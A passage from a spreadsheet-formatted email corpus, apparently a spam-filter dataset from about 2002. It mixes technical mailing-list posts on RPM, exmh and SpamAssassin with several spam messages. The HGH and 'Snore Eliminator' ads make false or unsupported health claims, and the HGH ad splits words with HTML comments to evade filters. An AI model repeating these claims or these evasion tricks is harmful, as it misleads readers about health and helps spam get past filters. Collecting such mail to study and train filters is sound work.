   height:150.75pt'&gt;
   &lt;p align=center style='text-align:center'&gt;&lt;b&gt;&lt;i&gt;&lt;span lang=EN-US
   style='font-size:12.0pt;font-family:Arial;color:black'&gt;&lt;a
   href="http://www.9to6.ie/special_offer.htm"&gt;Special
 Offer&lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=center style='text-align:center'&gt;&lt;span lang=EN-US
 style='font-family:
   Arial;color:black'&gt;&lt;a href="http://www.9to6.ie/special_offer.htm"&gt;&lt;span
   style='text-decoration:none'&gt;&lt;img border=0 width=100 height=133
   src="http://www.9to6.ie/9to6_special_2.files/photo_grade_paper_small.jpg"
 xthumbnail-orig-image="http://www.9to6.ie/stationery_images/2002/photo_grade
 _paper.jpg"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align=center style='text-align:center'&gt;&lt;b&gt;&lt;nobr&gt;&lt;span lang=EN-US
 style='font-family:Arial;color:black'&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/index.htm"&gt;Home&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt; &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/canon.htm"&gt;Canon&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt; &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/epson.htm"&gt;Epson&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt;[&lt;a
 href="http://www.9to6.ie/hewlett_packard.htm"&gt;Hewlett Packard&lt;/a&gt;]
 &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/oki.htm"&gt;Oki&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt; &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/brother.htm"&gt;Brother&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt;
 &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/xerox.htm"&gt;Xerox&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt;[&lt;a
 href="http://www.9to6.ie/refill_system.htm"&gt;Refill
 System&lt;/a&gt;]&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align=center style='text-align:center'&gt;&lt;b&gt;&lt;nobr&gt;&lt;span lang=EN-US
 style='font-family:Arial;color:black'&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/serv01.htm"&gt;Printing&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt;
 &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/serv02.htm"&gt;Photocopy&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt;
 &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/serv03.htm"&gt;T-Shirt&amp;nbsp;Printing&lt;/a&gt;
 &amp;nbsp;]&lt;/nobr&gt; &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/serv04.htm"&gt;Wedding&amp;nbsp;Stationery&lt;/a&gt;
 &amp;nbsp;][&lt;/nobr&gt;&lt;a
 href="http://www.9to6.ie/toner_specials.htm"&gt;LASER PRINTER CARTRIDGES AND
 TONER
 KITS&lt;/a&gt;]&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align=center style='text-align:center'&gt;&lt;b&gt;&lt;span lang=EN-US
 style='font-family:Arial;color:black'&gt;&lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/9to6_special.htm"&gt;9to6&amp;nbsp;Special&lt;/a&gt;
 &amp;nbsp;]&lt;/nobr&gt; &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/ink_again.htm"&gt;Ink&amp;nbsp;Again&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt;
 &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/wordtech.htm"&gt;Wordtech&amp;nbsp;Ink&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt;
 &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/novelty.htm"&gt;Novelty&amp;nbsp;Lighting&lt;/a&gt;
 &amp;nbsp;]&lt;/nobr&gt; &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/giftware.htm"&gt;Giftware&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt;
 &lt;nobr&gt;[&amp;nbsp;&lt;a
 href="http://www.9to6.ie/compter_consumables.htm"&gt;
 Computer&amp;nbsp;Consumables&lt;/a&gt;&amp;nbsp;]&lt;/nobr&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;p align="center"&gt;&lt;font size="3"&gt;&lt;b&gt;To unsubscribe, please e-mail us at
 &lt;a href="mailto:webmaster@9to6.ie"&gt;webmaster@9to6.ie&lt;/a&gt;.&amp;nbsp;
 &lt;font color="#FF0000"&gt;We apologise for any inconvenience
 caused.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Quitting Music
</t>
  </si>
  <si>
    <t xml:space="preserve">Keep your fingers crossed...
 Exhausted Britney 'wants to quit music'
 http://www.thisislondon.com/dynamic/news/story.html?in_review_id=661754&amp;in_review_text_id=632865
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Hehe :-) So your usual *n?x login is "dude" too? ;-)))))))
 &gt; 
 &gt; Matthias
 Hey Matthias,
 Actually it isn't, I used yours (I remembered from the RPM builder's guide "The fight" that your wrote). Mine is boring, I use kworthington, since my boxes are on a corporate LAN.
 Sorry to get your hopes up! You can think of it as a tribute to you if it makes you feel any better :-)
 ------------------------------------------------
 Kevin Worthington - &lt;kworthington (at) linuxmail {dot} org&gt;
 Faithful Red Hat Linux user since April 1998
 Registered Linux User #218689 - http://counter.li.org
 -- 
 Get your free email from www.linuxmail.org 
 Powered by Outblaze
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --_===6628399====mx1.yipes.com===_
 Content-Type: text/plain
 This is a warning message only.
   Your message remains in the server queue,
   the server will try to send it again.
   You should not try to resend your message now.
 Message delivery to 'casimir@tgsnopec.com' delayed
 SMTP module(domain tgsnopec.com) reports:
  relay.tgsnopec.com: no response
 --_===6628399====mx1.yipes.com===_
 Content-Type: message/delivery-status
 Reporting-MTA: dns; mx1.yipes.com
 Original-Recipient: rfc822;casimir@tgsnopec.com
 Final-Recipient: rfc822;casimir@tgsnopec.com
 Action: delayed
 --_===6628399====mx1.yipes.com===_
 Content-Type: text/rfc822-headers
 Received: from [216.136.171.252] (HELO usw-sf-list2.sourceforge.net)
   by mx1.yipes.com (CommuniGate Pro SMTP 3.5.1)
   with ESMTP-TLS id 6627220 for casimir@tgsnopec.com; Thu, 05 Sep 2002 01:35:26 -0700
 Received: from usw-sf-list1-b.sourceforge.net ([10.3.1.13] helo=usw-sf-list1.sourceforge.net)
 	by usw-sf-list2.sourceforge.net with esmtp (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17mryq-0000eK-00; Thu, 05 Sep 2002 01:27:12 -0700
 Received: from hippo.star.co.uk ([195.216.14.9])
 	by usw-sf-list1.sourceforge.net with smtp (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17mryb-000529-00
 	for &lt;spamassassin-talk@lists.sourceforge.net&gt;; Thu, 05 Sep 2002 01:26:58 -0700
 Received: from MATT_LINUX by hippo.star.co.uk
           via smtpd (for usw-sf-lists.sourceforge.net [216.136.171.198]) with SMTP; 5 Sep 2002 08:17:57 UT
 Received: (qmail 28723 invoked from network); 3 Sep 2002 08:22:05 -0000
 Received: from unknown (HELO startechgroup.co.uk) (10.2.100.178)
   by matt?dev.int.star.co.uk with SMTP; 3 Sep 2002 08:22:05 -0000
 Message-ID: &lt;3D77146F.1000603@startechgroup.co.uk&gt;
 From: Matt Sergeant &lt;msergeant@startechgroup.co.uk&gt;
 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020901
 X-Accept-Language: en-us, en
 MIME-Version: 1.0
 To: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;
 CC: Justin Mason &lt;yyyy@spamassassin.taint.org&gt;, 
  spamassassin-talk@lists.sourceforge.net
 Subject: Re: [SAtalk] [OT] Perl problem and 2.40 released
 References: &lt;D79A56AD131896448D0860DEE07CBE1FE1DE@med-core07.med.wayne.edu&gt;
 Content-Type: text/plain; charset=us-ascii; format=flowed
 Content-Transfer-Encoding: 7bit
 Sender: spamassassin-talk-admin@example.sourceforge.net
 Errors-To: spamassassin-talk-admin@example.sourceforge.net
 X-BeenThere: spamassassin-talk@example.sourceforge.net
 X-Mailman-Version: 2.0.9-sf.net
 Precedence: bulk
 List-Help: &lt;mailto:spamassassin-talk-request@example.sourceforge.net?subject=help&gt;
 List-Post: &lt;mailto:spamassassin-talk@example.sourceforge.net&gt;
 List-Subscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=subscribe&gt;
 List-Id: Talk about SpamAssassin &lt;spamassassin-talk.example.sourceforge.net&gt;
 List-Unsubscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe&gt;
 List-Archive: &lt;http://www.geocrawler.com/redir-sf.php3?list=spamassassin-talk&gt;
 X-Original-Date: Thu, 05 Sep 2002 09:23:11 +0100
 Date: Thu, 05 Sep 2002 09:23:11 +0100
 --_===6628399====mx1.yipes.com===_--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; -----Original Message-----
 &gt; From: Matthias Saou [mailto:matthias@egwn.net]
 &gt; Sent: Monday, August 19, 2002 5:25 PM
 &gt; To: rpm-zzzlist@freshrpms.net
 &gt; Subject: Re: when building a rpm i386-redhat-linux- is appended to man
 &gt; page
 &gt; 
 &gt; 
 &gt; Once upon a time, Harig, wrote :
 &gt; 
 &gt; &gt; &gt; 
 &gt; &gt; &gt; The workaround is to pass an extra argument to configure 
 &gt; as follows :
 &gt; &gt; &gt; 
 &gt; &gt; &gt; %configure --program-prefix=%{?_program_prefix:%{_program_prefix}}
 &gt; &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; This works when you are defining a switch that %configure
 &gt; &gt; does not already define, but how can we override an
 &gt; &gt; existing switch?
 &gt; 
 &gt; Well, %configure doesn't define "--program-prefix=", so that's why it
 &gt; works. Maybe you thought that was an example, but no, it's 
 &gt; the exact syntax
 &gt; to use as a workaround ;-)
 &gt; 
 &gt; Matthias
 &gt; 
 Actually, I was hoping that you could answer the question "how can we 
 override an existing switch?"  For example, %configure uses the command-
 line switch '--prefix'.  How can we override that value?
   %configure ???
 ---
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-195849857P
 Content-Type: text/plain; charset=us-ascii
 Ouch...I'll get right on it.
 &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700
 &gt;
 &gt;     Date:        Tue, 20 Aug 2002 17:27:47 -0500
 &gt;     From:        Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt;     Message-ID:  &lt;1029882468.3116.TMDA@deepeddy.vircio.com&gt;
 &gt; 
 &gt; 
 &gt;   | I'm hoping that all people with no additional sequences will notice are
 &gt;   | purely cosmetic changes.
 &gt; 
 &gt; Well, first, when exmh (the latest one with your changes) starts, I get...
 &gt; 
 &gt; can't read "flist(totalcount,unseen)": no such element in array
 &gt;     while executing
 &gt; "if {$flist(totalcount,$mhProfile(unseen-sequence)) &gt; 0} {
 &gt; 	FlagInner spool iconspool labelup
 &gt;     } else {
 &gt; 	FlagInner down icondown labeldown
 &gt;     }"
 &gt;     (procedure "Flag_MsgSeen" line 3)
 &gt;     invoked from within
 &gt; "Flag_MsgSeen"
 &gt;     (procedure "MsgSeen" line 8)
 &gt;     invoked from within
 &gt; "MsgSeen $msgid"
 &gt;     (procedure "MsgShow" line 12)
 &gt;     invoked from within
 &gt; "MsgShow $msgid"
 &gt;     (procedure "MsgChange" line 17)
 &gt;     invoked from within
 &gt; "MsgChange 4862 show"
 &gt;     invoked from within
 &gt; "time [list MsgChange $msgid $show"
 &gt;     (procedure "Msg_Change" line 3)
 &gt;     invoked from within
 &gt; "Msg_Change $msg(id) $show"
 &gt;     (procedure "Msg_Show" line 7)
 &gt;     invoked from within
 &gt; "Msg_Show cur"
 &gt;     ("eval" body line 1)
 &gt;     invoked from within
 &gt; "eval $msgShowProc"
 &gt;     (procedure "FolderChange" line 55)
 &gt;     invoked from within
 &gt; "FolderChange inbox {Msg_Show cur}"
 &gt;     invoked from within
 &gt; "time [list  FolderChange $folder $msgShowProc"
 &gt;     (procedure "Folder_Change" line 3)
 &gt;     invoked from within
 &gt; "Folder_Change $exmh(folder)"
 &gt;     (procedure "Exmh" line 101)
 &gt;     invoked from within
 &gt; "Exmh"
 &gt;     ("after" script)
 &gt; 
 &gt; which is probably related to my not having an "unseen" sequence anywhere
 &gt; (certainly not in inbox) - I read all of my outstanding mail before I
 &gt; tried this new exmh ...
 &gt; 
 &gt; Second, I've been used to having a key binding which was to Msg_MarkUnseen
 &gt; which doesn't seem to exist any more, and I'm not sure what I should replac
 &gt; e
 &gt; that with.   There's obviously a way as the "Sequences" menu does this.
 &gt; The "Mark Unseen" menu entry in the message "More" menu is still wanting
 &gt; that function as well...
 &gt; 
 &gt;   | For those who have other sequences defined, the window will widen to
 &gt;   | display the other sequences.
 &gt; 
 &gt; Any chance of having that lengthen instead?   I like all my exmh stuff
 &gt; in nice columns (fits the display better).   That is, I use the detached
 &gt; folder list, one column.   The main exmh window takes up full screen,
 &gt; top to bottom, but less than half the width, etc...
 &gt; 
 &gt; I have space for more sequences, in the "unseen" window, as long as they
 &gt; remain once nice narrow window (best would be if the sequences could be
 &gt; ordered by some preference, then ones which didn't fit would just fall
 &gt; off the bottom, and not be shown).
 &gt; 
 &gt; I'd also prefer it if that window had no unusual background colouring,
 &gt; just one constant colour - I have been running the unseen window with
 &gt; background black, on a root window that is all black, with no borders or
 &gt; other decorations, but made "sticky" - the appearance is just like the
 &gt; folders with unseen messages (and their counts) are written into the
 &gt; root window (because it is sticky, this small display follows me around
 &gt; and do I can see when new mail needs processing).
 &gt; 
 &gt; I also find that I tend to have a bunch of sequences that only ever occur
 &gt; in one folder (some I had forgotten I ever created).  So in addition to
 &gt; the "sequences to always show" and "sequences to never show", a
 &gt; preference to only show sequences that occur in more than one folder
 &gt; would be useful, and then have the sequences that occor only in the
 &gt; folder I'm visiting appear in the list when that folder is current.
 &gt; This is just to keep the list size somewhat manageable while remaining
 &gt; productive (I quite often use a sequence to remember a particular message
 &gt; in a folder - the name is used only there, and only for one message,
 &gt; it gives me a handle on the message which remains as the folder is
 &gt; packed, sorted, etc).
 &gt; 
 &gt; I haven't updated my exmh for some time now, so I'm not sure if this
 &gt; next one is new, or just new since 2.5, but the Sequences menu (on the
 &gt; bar with New Flist Search ...) only contains "unseen" and "urgent".
 &gt; It would be useful if it contained all of the sequences that the folder
 &gt; happens to have defined.   A "New sequence" entry would also be useful
 &gt; (to mark the message with a sequence name that didn't previously exist,
 &gt; which can be done now using "Search" and the pick interface, but is
 &gt; clumsy that way)
 &gt; 
 &gt; Actually, you once could, now when I try this, entering a sequence name
 &gt; in the pick box, and a single message number, or a range N-N in the
 &gt; list of messages, and no pick attributes at all, I now get ...
 &gt; 
 &gt; syntax error in expression "int(1+1+(1 hit-1)*(3868-1-2)/(4878-1))"
 &gt;     while executing
 &gt; "expr int($minlineno+1+($msgid-$minmsgid)*($maxlineno-$minlineno-2)/($maxms
 &gt; gid-$minmsgid))"
 &gt;     (procedure "Ftoc_FindMsg" line 46)
 &gt;     invoked from within
 &gt; "Ftoc_FindMsg $msg"
 &gt;     (procedure "Ftoc_FindMsgs" line 5)
 &gt;     invoked from within
 &gt; "Ftoc_FindMsgs $msgids"
 &gt;     (procedure "Ftoc_PickMsgs" line 5)
 &gt;     invoked from within
 &gt; "Ftoc_PickMsgs $pick(ids) $pick(addtosel)"
 &gt;     (procedure "PickInner" line 13)
 &gt;     invoked from within
 &gt; "PickInner {exec pick +inbox -list} {4852 -sequence mercury}"
 &gt;     ("uplevel" body line 1)
 &gt;     invoked from within
 &gt; "uplevel #0 $cmd"
 &gt;     (procedure "busyCursorInner" line 8)
 &gt;     invoked from within
 &gt; "busyCursorInner $cmd $widgets"
 &gt;     (procedure "busyCursorHack" line 32)
 &gt;     invoked from within
 &gt; "busyCursorHack $args"
 &gt;     ("cursor" arm line 1)
 &gt;     invoked from within
 &gt; "switch $busy(style) {
 &gt; 	icon		{busyIcon $args}
 &gt; 	cursorAll	{busyCursor $args}
 &gt; 	cursor		{busyCursorHack $args}
 &gt; 	default		{eval $args}
 &gt;     }"
 &gt;     (procedure "busy" line 3)
 &gt;     invoked from within
 &gt; "busy PickInner $cmd $msgs"
 &gt;     (procedure "Pick_It" line 51)
 &gt;     invoked from within
 &gt; "Pick_It"
 &gt;     invoked from within
 &gt; ".pick.but.pick invoke"
 &gt;     ("uplevel" body line 1)
 &gt;     invoked from within
 &gt; "uplevel #0 [list $w invoke]"
 &gt;     (procedure "tkButtonUp" line 7)
 &gt;     invoked from within
 &gt; "tkButtonUp .pick.but.pick
 &gt; "
 &gt;     (command bound to event)
 &gt; 
 &gt; It has been ages since I did this last though.   I tried adding a Subject
 &gt; to pick on (easy as I know what's in the message...) which made no differen
 &gt; ce.
 &gt; Looks as if something is now saying "1 hit" when before it didn't, or
 &gt; similar.
 &gt; 
 &gt;   | I've also changed the ftoc colorization as discussed briefly on the lis
 &gt; t a 
 &gt;   | week or so ago.
 &gt; 
 &gt; Any chance of making the current message a little brighter background?
 &gt; Just to make it stand out a fraction more than it does (maybe this is
 &gt; more apparent to me than many, as I use very small fonts everywhere,
 &gt; the background of the ftoc line isn't very wide).
 &gt; 
 &gt; Hope this helps.
 &gt; 
 &gt; kre
 &gt; 
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; Exmh-workers mailing list
 &gt; Exmh-workers@redhat.com
 &gt; https://listman.redhat.com/mailman/listinfo/exmh-workers
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-195849857P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Y68ZK9b4h5R0IUIRAniQAJ0Xp6L4Dh32pMeWnpt5C8+lbBuELQCdH1aV
 heczndJHLLRNAg3S6FTpDw8=
 =coew
 -----END PGP SIGNATURE-----
 --==_Exmh_-195849857P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: integrating a couple spamassassin actions into the More... menu
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Harlan Feinstein said:
 &gt; In particular, I was going to have a menu entry available for:
 &gt; o  remove the SA markup from a message
 &gt; o  add/remove addresses to whitelist
 &gt; Help!  :-)  I've never done customization of this type to my exmh install.
 &gt; I'm running version 2.4 (6/23/2000) on RedHat 7.3
 Despite being the author of SpamAssassin, I've never fixed exmh to do
 this.  I am therefore clearly not an exmh hacker ;)
 But to simplify -- the first action is piping the message to an external
 command, then replacing the message file with the output; and the second
 is simply piping the message to another command, then ignoring the output.
 I'd say it's easy enough to do, if someone can provide the tcl.
 --j.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: fork,HGH Liquid!  Lose Weight...Gain Muscle...Affordable Youth!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;Hello, fork@xent.com&lt;BR&gt;&lt;BR&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Human Growth Hormone Therapy&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lose weight while building lean muscle mass&lt;br&gt;and reversing the ravages of aging all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;Remarkable discoveries about Human Growth Hormones (&lt;b&gt;HGH&lt;/b&gt;) &lt;br&gt;are changing the way we think about aging and weight loss.&lt;/font&gt;&lt;/p&gt;
 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;&lt;td height="2" width="247"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Lose Weight&lt;br&gt;Build Muscle Tone&lt;br&gt;Reverse Aging&lt;br&gt;
 Increased Libido&lt;br&gt;Duration Of Penile Erection&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;td height="2" width="222"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Healthier Bones&lt;br&gt;
 Improved Memory&lt;br&gt;Improved skin&lt;br&gt;New Hair Growth&lt;br&gt;Wrinkle Disappearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;
 &lt;p align="center"&gt;&lt;a href="http://202.101.163.34:81/ultimatehgh_run/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;Visit 
   Our Web Site and Learn The Facts : Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;a href="http://64.123.160.91:81/ultimatehgh_run/"&gt;&lt;font size="4"&gt;&lt;b&gt;OR 
   Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;div align="center"&gt;&lt;br&gt;
   You are receiving this email as a subscr&lt;!--fork--&gt;iber&lt;br&gt;
   to the Opt&lt;!--fork--&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!--fork--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;just &lt;a href="http://202.101.163.34:81/ultimatehgh_run/remove.php?userid=fork@xent.com"&gt;Click Here&lt;/a&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNN Headline News: To Blog or not to Blog.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:3:56:54PM
 Date: Mon, 23 Sep 2002 22:56:54 GMT
 CNN Headline News: To Blog or not to Blog[1].
 [1] http://www.cnn.com/2002/SHOWBIZ/09/20/hln.hot.buzz.blog/index.html
</t>
  </si>
  <si>
    <t xml:space="preserve">[Brad Clements]
 &gt; Just curious if subject line capitalization can be used as an indicator.
 &gt;
 &gt; Either the percentage of characters that are caps..
 &gt;
 &gt; Or, percentage starting with a capital letter (if number of words &gt; xx)
 Supply a mod to tokenizer.py and I'll test it (eventually &lt;wink&gt;).  Note
 that the tokenizer already *preserves* case in subject-line words, because
 experiment showed that this was better than folding case away in this
 specific context (but experiment also showed-- against my
 expectations --that preserving case everywhere didn't make a significant
 difference to either error rate -- the subject line is a special case for
 this).
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Antoine wrote :
 &gt; Hi, I wanted to know if I could post a request for rpm on the list, or if
 &gt; I had to contact Mathias directly ?
 &gt; Thanks...
 Well, since you posted, you could have asked just in case while you were at
 it ;-) I don't often fulfill requests, so don't expect any miracles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</si>
  <si>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Why not try?                                      . aknmq
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#C0C0C0"&gt;
 &lt;font FACE="MS Sans Serif" COLOR="#800000"&gt;
 &lt;p&gt;Snoring problems?&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt; Let Snore
 Eliminator's all natural ingredients help you
 sleep!&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;font size="1"&gt;1r&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;Is&lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000ff"&gt; snoring&lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 keeping you up all night? &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;No
 more sleepless nights with&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 Snore Eliminator!!&lt;/p&gt;
 &lt;p&gt;Let your family sleep again by using the Snore Eliminator!&lt;/p&gt;
 &lt;p&gt;Do you know someone with a snoring problem? Snore Eliminator will help them
 and they will love you for it.&lt;/p&gt;
 &lt;p&gt;Improve your sexual performance by reducing snoring and thus increasing
 oxygen to your body!!&lt;/p&gt;
 &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;
 &lt;p&gt;People who snore have a higher risk of developing heart attacks, high blood
 pressure, or strokes!! &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;Snoring
 also causes sleep disturbances that lead to increased anxiety,
 hyperirritability, and decreased memory!&lt;/p&gt;
 &lt;p&gt;Individuals who snore have a 90% chance of daytime fatigue. Nine out of every
 ten victims are male!&lt;/p&gt;
 &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;
 &lt;p&gt;How the Snore Eliminator will help you!&lt;/p&gt;
 &lt;b&gt;
 &lt;p&gt;What Causes Snoring?&lt;/p&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 &lt;p&gt;Over-relaxed throat and tongue muscles due to poor throat muscle&lt;/p&gt;
 &lt;p&gt;Excessive fat on the throat&lt;/p&gt;
 &lt;p&gt;Accumulation of secretion in the back of the throat and&lt;/p&gt;
 &lt;p&gt;Throat swelling from allergies and food&lt;/p&gt;
 &lt;p&gt;Heavy snoring is often associated with apnea, or the &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;stopping
 of breathing, &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;during sleep. As
 an individuals sleeps his or her sleeping pattern is disrupted and fragmented
 due to snoring, thus they are never well rested. This can be a very hazardous
 problem if someone is not getting proper REM sleep. Snoring is the audible
 symptom of a &lt;b&gt;blocked airway during sleep.&lt;/p&gt;
 &lt;/b&gt;
 &lt;p&gt;The noise is caused by a vibration in the soft palate as the lungs pull hard
 to take in a &lt;b&gt;weakened current of incoming air. &lt;/b&gt;This blockage may result
 from any number of circumstances, and these offer clues to get rid of the
 problem.&lt;/p&gt;
 &lt;p&gt;Snoring is also more than likely to occur among people who &lt;b&gt;sleep on their
 backs&lt;/b&gt;; the tongue falls back toward the throat and partly closes the airway.&lt;/p&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;
 &lt;p&gt;The hidden dangers of snoring?&lt;/p&gt;
 &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 &lt;blockquote&gt;
   &lt;blockquote&gt;
   &lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 &lt;p&gt;Snoring could increase the chances of a heart attack if not treated&lt;/p&gt;
 &lt;p&gt;Hypertension and increased anxiety are associated with snoring&lt;/p&gt;
 &lt;p&gt;Snoring causes sleep apnea a serious treatable medical condition&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;/blockquote&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;
 &lt;p&gt;Snoring decreases sexual performance&lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;
 &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;by half, due to lack of oxygen
 to the brain which decreases sexual responsiveness.&lt;/p&gt;
